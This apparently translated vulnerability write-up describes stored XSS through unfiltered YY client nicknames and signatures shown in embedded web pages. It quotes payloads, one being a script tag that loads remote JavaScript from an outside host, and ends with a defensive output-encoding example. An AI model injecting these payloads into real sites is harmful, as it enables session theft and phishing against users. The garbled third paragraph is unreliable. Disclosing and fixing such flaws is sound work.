YY client defect causes stored XSS

Source: Internet
Author: User

Like QQ, YY accounts have nicknames and signatures. The QQ client and QQ web are seamlessly connected, so code such as "> and '> does nothing in the client but can appear directly in the web pages as XSS. For details, see http://tmxk.org/thread-496-1-1.html. YY made the same mistake.

The YY nickname is limited to 20 bytes. It is difficult to construct feasible code in that space, but testing shows the nickname is not filtered. In extreme cases XSS is still possible, for example <embed/src=//x.cn/x>, which is enough for clickjacking and phishing. There is no limit on the YY signature, so code such as <script/src=//tmxk.org/.js></script> fits directly. How do we make that code appear on the web?

1. Let's test it in the channel. First, I determined that the YY channel is an embedded web page. This design is common; many clients use it, and the web source code can be viewed. Press Ctrl + A to copy the current page. Open an online editor and press Ctrl + C. In the editor's source code mode, you can see the source code of the copied web page. In this way, we can know the form the signature code takes on the web.

2. First, we tested the forum and posted a post. We found that the forum editor is rich text, not a textarea, so rich-text code can be inserted. Because the web page is embedded, I could not capture packets, so I found the forum's web page using the method above and found that the rich text had been filtered. This is the forum URL:

http://y.duowan.com/channel2/52399485/index

0x1.2 We change the signature or nickname into code and repeat the same operation. The code is executed. These are the corresponding URLs:

http://y.duowan.com/channel2/getDetail?ChannelId=52399485&bbsZoneId=wEkJNgE-SR4&topicId=wEqk-d1-Pi7
http://y.duowan.com/channel2/getDetail?ChannelId=52399485&bbsZoneId=wEqixf--ONF&topicId=wEqiyVZ-OOB

This is the execution status in the YY client.

I guess this simple browser has a decisive interface for interacting with scripts, but I have no patience to look for it.

3. As long as the member is a member of the guild, the member of the guild will be recruited. Stealing a purple horse is not a nightmare. Combined with games, music, and other functions, you can enjoy full advantage.
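A defensive illustration of the flaw described above, added here and not part of the original article or of YY's code: the nickname and signature reach a web view unencoded, and encoding them at output time neutralizes both payloads the article quotes. The HTML template, the function names and the profile objects are assumptions made for the example.

```javascript
// Constructed profile data using the two payload shapes quoted in the article.
const profiles = [
  { nickname: "<embed/src=//x.cn/x>", signature: "hello" }, // fits the 20-byte nickname
  { nickname: "user", signature: "<script/src=//tmxk.org/.js></script>" },
];

// Encode the five characters that can break out of HTML text or a quoted attribute.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// The defect: profile fields are concatenated into markup as-is.
// (Hypothetical template; the real page structure is not shown in the article.)
function renderAuthorUnsafe(p) {
  return `<div class="author" title="${p.signature}"><b>${p.nickname}</b><p>${p.signature}</p></div>`;
}

// The fix: encode at output time, in every web view that displays these fields.
// A length limit on the nickname is not a substitute for this.
function renderAuthorSafe(p) {
  const nick = escapeHtml(p.nickname);
  const sig = escapeHtml(p.signature);
  return `<div class="author" title="${sig}"><b>${nick}</b><p>${sig}</p></div>`;
}

// Regression check: does the output contain any tag other than the template's own?
function hasInjectedMarkup(html) {
  const tags = html.match(/<\/?([a-zA-Z][\w-]*)/g) || [];
  const allowed = new Set(["<div", "</div", "<b", "</b", "<p", "</p"]);
  return tags.some((t) => !allowed.has(t.toLowerCase()));
}

for (const p of profiles) {
  console.log("unsafe:", hasInjectedMarkup(renderAuthorUnsafe(p)),
              "safe:", hasInjectedMarkup(renderAuthorSafe(p)));
}
```

The same check can run as a regression test against each web page that displays client-supplied profile fields, since the client and the forum editor filtering their own input does not protect the other views.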
